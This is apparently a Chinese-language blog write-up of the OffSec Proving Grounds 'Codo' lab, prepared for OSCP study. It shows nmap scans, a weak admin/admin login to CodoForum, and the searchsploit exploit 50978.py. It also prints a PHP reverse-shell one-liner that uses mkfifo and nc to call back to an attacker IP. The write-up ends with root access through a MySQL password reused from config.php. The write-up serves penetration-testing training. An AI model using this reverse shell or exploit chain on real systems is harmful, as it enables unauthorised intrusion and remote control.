OSCP Codo Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Codo

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

CodoForum 后台弱口令 –> CodoForum 后台文件上传 –> www-data 权限

权限提升:

信息搜集 –> Mysql 数据库登录密码复用 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
sudo nmap -p- 192.168.212.23 --min-rate=2000

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sudo nmap -p22,80 -sCV 192.168.212.23

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: All topics | CODOLOGIC
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 CodoForum 后台弱口令、文件上传

访问系统 HTTP 80 端口,可通过弱口令登录系统后台。

1
admin/admin

根据左下角可得知系统使用了 CodoForum 应用,使用 searchsploit 检索,发现该应用可能存在远程代码执行漏洞。

1
searchsploit Codoforum

复制漏洞利用代码,尝试执行获取反弹 shell,注意: 脚本中设置了代理,可开启 burp 接收代理请求,或者关闭脚本中的代理配置。

1
2
3
searchsploit -m php/webapps/50978.py
nc -lvnp 1234
python3 50978.py -t http://192.168.212.23/ -u admin -p admin -i 192.168.45.227 -n 1234

再次执行漏洞利用脚本,发现依然报错,提示我们手动上传 web shell。

首先创建 php 反弹 shell。

1
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.227 1234 >/tmp/f");?>

然后访问系统 admin 目录,通过弱口令登录系统后台,在 global settings 上传 php shell 文件。

1
admin/admin

访问脚本中提示的链接,触发反弹 shell,成功得到了系统 www-data 用户 shell。

1
http://192.168.212.23//sites/default/assets/img/attachments/shell.php

升级为交互式 shell。

访问靶机 offsec 用户目录,没有发现用户旗帜。

3.3 提权获取系统管理员权限

3.3.1 Mysql 密码复用获取 root 用户权限

在系统网站目录发现 Mysql 数据库连接密码,通过密码复用,成功切换至 root 用户。

1
2
find ./ -iname "config.*"
cat sites/default/config.php

1
2
# FatPanda123
su root

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Linux #CodoForum 后台弱口令文件上传漏洞 #密码复用
OSCP Codo Write-up
https://www.f0nesec.top/2025/08/23/oscp-codo/
作者
F0ne
发布于
2025年8月23日
许可协议